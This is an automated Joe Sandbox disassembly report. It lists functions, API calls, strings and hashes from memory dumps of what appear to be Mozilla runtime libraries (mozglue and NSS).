                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                        • Opcode ID: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
                                                                                                                                                                                                                                                                                        • Instruction ID: 4096ec05f7490cea25d8069db6c54915ee07951c2439fd57d3a115c1c4d5b614
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAF1F3709052199FDB20CF25CE88B9AB7B4AF45318F5442E9E809A7741EB31AF94CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C76D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D50B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D52E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D6A6
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D712
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D751
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D7EA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
                                                                                                                                                                                                                                                                                        • Instruction ID: 995d13fdeb35d8e484a8867a390f5a75d3f75f6c547f1bcc68da5d251c4f77d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A91F571A147458FD714CF3AC29476AB7E1EBA9314F24893EE85A87F81D730E844CB86
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8B6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C60
                                                                                                                                                                                                                                                                                        • PR_ExplodeTime.NSS3(00000000,6C861C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C94
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                        • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                        • Opcode ID: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
                                                                                                                                                                                                                                                                                        • Instruction ID: a185a8f48e782ba5d54b16ec129dba9c11bd233bff8a5014129a30d068e077fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3514C72B015494FC71CCDADDC626DAB7DAABA4310F48C23AE442DB785D638E906C751
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7B545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B8A4B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID: ~qtl
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4039154517
                                                                                                                                                                                                                                                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction ID: 43b63620c4766762d50e298508506ead9c8a38e7e8957a14f21546e44531ee93
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4B1E672E0121A8FDB14CF68CD907E9B7B2EF95314F1802B9C559EB786D730A985CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7B542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B88F0
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C7B925C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID: ~qtl
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4039154517
                                                                                                                                                                                                                                                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction ID: eb7fe4ae62fe846af9d49f715bda305596c7bedc38339d71bb0d1817cbd0e960
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23B1C472E0120A8FDB14CE68C9816EDB7B2EF95314F184279C959EB785D730A989CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C930C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e46ae58c0ee5523e9bec640e8fdd1f0e4b6cef39bc2c3c47083b0a2248aac3a2
                                                                                                                                                                                                                                                                                        • Instruction ID: b475945edc007d0e16dd8d22dff84ea01919cda12edbac8af1a804b18ed7e494
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e46ae58c0ee5523e9bec640e8fdd1f0e4b6cef39bc2c3c47083b0a2248aac3a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4211CE79708315DFCB00DF29C884A6A77B6FFC5368F249069D8198B701DB71E806CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32,?,6C77E1A5), ref: 6C7A5606
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C77E1A5), ref: 6C7A560F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C7A5633
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C7A563D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C7A566C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C7A567D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C7A5696
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7A56B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7A56CB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7A56E4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7A56FD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C7A5716
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C7A572F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C7A5748
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C7A5761
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C7A577A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C7A5793
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7A57A8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7A57BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7A57D5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7A57EA
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7A57FF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                        • Opcode ID: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
                                                                                                                                                                                                                                                                                        • Instruction ID: 27bbf817458b31280ffb3ec4afd021103bd54c46169a690e2472274afd9a2690
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B516274701B076FDB449F76AF4492A3AFCBB0AB45B104539B921E3A01EB74DB018F61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C78CC27
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C78CC3D
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C7BFE98), ref: 6C78CC56
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C78CC6C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C78CC82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C78CC98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C78CCAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C78CCC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C78CCDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C78CCEC
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C78CCFE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C78CD14
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C78CD82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C78CD98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C78CDAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C78CDC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C78CDDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C78CDF0
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C78CE06
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C78CE1C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C78CE32
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C78CE48
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C78CE5E
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C78CE74
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C78CE8A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strcmp
                                                                                                                                                                                                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                        • Opcode ID: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
                                                                                                                                                                                                                                                                                        • Instruction ID: 6417eee8646b84a425ab46301be522ce33ef7fe13acb619d5ba3af4b526f11c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B551BBC5A4722552FA0035256F1ABAA1409EF5324BF50C63AEF09B2F80FF15F70986B7
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C754470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C754730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7544B2,6C7CE21C,6C7CF7F8), ref: 6C75473E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C754730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C75474A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7544BA
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7544D2
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C7CF80C,6C74F240,?,?), ref: 6C75451A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75455C
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C754592
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C7CF770), ref: 6C7545A2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C7545AA
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C7545BB
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C7CF818,6C74F240,?,?), ref: 6C754612
                                                                                                                                                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C754636
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C754644
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C75466D
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C75469F
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546AB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546B2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546B9
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546C0
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7546CD
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C7546F1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7546FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
